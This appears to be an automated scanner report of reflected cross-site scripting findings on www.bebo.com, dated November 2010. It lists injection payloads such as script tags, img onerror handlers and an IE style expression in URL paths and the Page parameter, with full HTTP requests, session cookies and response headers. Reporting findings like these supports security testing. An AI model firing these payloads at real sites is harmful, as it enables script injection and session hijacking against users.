The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d45"><img%20src%3da%20onerror%3dalert(1)>6eb76697f7a was submitted in the REST URL parameter 1. This input was echoed as 38d45"><img src=a onerror=alert(1)>6eb76697f7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /InviteJoin.jsp38d45"><img%20src%3da%20onerror%3dalert(1)>6eb76697f7a HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: nl-NL Content-Type: text/html; charset=UTF-8 Content-Length: 8805 Date: Mon, 15 Nov 2010 22:43:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44270'%3b5bef3a2aedc was submitted in the REST URL parameter 1. This input was echoed as 44270';5bef3a2aedc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /InviteJoin.jsp44270'%3b5bef3a2aedc HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: nl-NL Content-Type: text/html; charset=UTF-8 Content-Length: 8553 Date: Mon, 15 Nov 2010 22:43:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9de3<img%20src%3da%20onerror%3dalert(1)>b096167d7de was submitted in the REST URL parameter 1. This input was echoed as a9de3<img src=a onerror=alert(1)>b096167d7de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /InviteJoin.jspa9de3<img%20src%3da%20onerror%3dalert(1)>b096167d7de HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: nl-NL Content-Type: text/html; charset=UTF-8 Content-Length: 8787 Date: Mon, 15 Nov 2010 22:43:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f3d3<script>alert(1)</script>1e253450b59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Profile.jsp2f3d3<script>alert(1)</script>1e253450b59 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10727 Date: Mon, 15 Nov 2010 22:43:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/profile2f3d3<script>alert(1)</script>1e253450b59 page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9bd0'><script>alert(1)</script>6f49b9cb5c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Profile.jspc9bd0'><script>alert(1)</script>6f49b9cb5c0 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: pl-PL Content-Type: text/html; charset=UTF-8 Content-Length: 9043 Date: Mon, 15 Nov 2010 22:43:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99464'%3bb32a164464a was submitted in the REST URL parameter 1. This input was echoed as 99464';b32a164464a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Profile.jsp99464'%3bb32a164464a HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: pl-PL Content-Type: text/html; charset=UTF-8 Content-Length: 8818 Date: Mon, 15 Nov 2010 22:43:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c91e"><img%20src%3da%20onerror%3dalert(1)>93ab9987253 was submitted in the REST URL parameter 1. This input was echoed as 3c91e"><img src=a onerror=alert(1)>93ab9987253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Profile.jsp3c91e"><img%20src%3da%20onerror%3dalert(1)>93ab9987253 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: es-ES Content-Type: text/html; charset=UTF-8 Content-Length: 9184 Date: Mon, 15 Nov 2010 22:43:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f10c"><img%20src%3da%20onerror%3dalert(1)>2c267759fd3 was submitted in the Page parameter. This input was echoed as 5f10c"><img src=a onerror=alert(1)>2c267759fd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /SwitchLanguage.jsp?Page=c/site/index5f10c"><img%20src%3da%20onerror%3dalert(1)>2c267759fd3&QueryString=&Lang=nl HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response (redirected)
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: nl-NL Content-Type: text/html; charset=UTF-8 Content-Length: 8711 Date: Mon, 15 Nov 2010 22:43:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Page request parameter is copied into the HTML document as plain text between tags. The payload fa7a3<img%20src%3da%20onerror%3dalert(1)>fda7e98343d was submitted in the Page parameter. This input was echoed as fa7a3<img src=a onerror=alert(1)>fda7e98343d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /SwitchLanguage.jsp?Page=c/site/indexfa7a3<img%20src%3da%20onerror%3dalert(1)>fda7e98343d&QueryString=&Lang=nl HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response (redirected)
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: nl-NL Content-Type: text/html; charset=UTF-8 Content-Length: 8693 Date: Mon, 15 Nov 2010 22:43:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9483c'style%3d'x%3aexpression(alert(1))'14c655a3c95 was submitted in the Page parameter. This input was echoed as 9483c'style='x:expression(alert(1))'14c655a3c95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /SwitchLanguage.jsp?Page=c/site/index9483c'style%3d'x%3aexpression(alert(1))'14c655a3c95&QueryString=&Lang=nl HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response (redirected)
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: fr-FR Content-Type: text/html; charset=UTF-8 Content-Length: 8693 Date: Mon, 15 Nov 2010 22:43:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73ab2'%3b5b03293fd4b was submitted in the Page parameter. This input was echoed as 73ab2';5b03293fd4b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /SwitchLanguage.jsp?Page=c/site/index73ab2'%3b5b03293fd4b&QueryString=&Lang=nl HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response (redirected)
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: es-ES Content-Type: text/html; charset=UTF-8 Content-Length: 8531 Date: Mon, 15 Nov 2010 22:43:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bbb51'><script>alert(1)</script>51b11906c4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aboutbbb51'><script>alert(1)</script>51b11906c4e HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10727 Date: Mon, 15 Nov 2010 22:43:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f1aa'%3beb66ea08b73 was submitted in the REST URL parameter 2. This input was echoed as 3f1aa';eb66ea08b73 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/about3f1aa'%3beb66ea08b73 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10516 Date: Mon, 15 Nov 2010 22:43:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e86a"><img%20src%3da%20onerror%3dalert(1)>2945a5ba57f was submitted in the REST URL parameter 2. This input was echoed as 5e86a"><img src=a onerror=alert(1)>2945a5ba57f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/about5e86a"><img%20src%3da%20onerror%3dalert(1)>2945a5ba57f HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10810 Date: Mon, 15 Nov 2010 22:43:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7aa4e<script>alert(1)</script>f4eadbae3d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/about7aa4e<script>alert(1)</script>f4eadbae3d7 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10709 Date: Mon, 15 Nov 2010 22:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/about7aa4e<script>alert(1)</script>f4eadbae3d7 page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 383ee'><script>alert(1)</script>2c29c2ad8e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/about383ee'><script>alert(1)</script>2c29c2ad8e7/help HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10772 Date: Mon, 15 Nov 2010 22:43:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99129<script>alert(1)</script>0069156af62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/about99129<script>alert(1)</script>0069156af62/help HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10754 Date: Mon, 15 Nov 2010 22:43:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/about99129<script>alert(1)</script>0069156af62/help page, please try again.</div> ...[SNIP]...
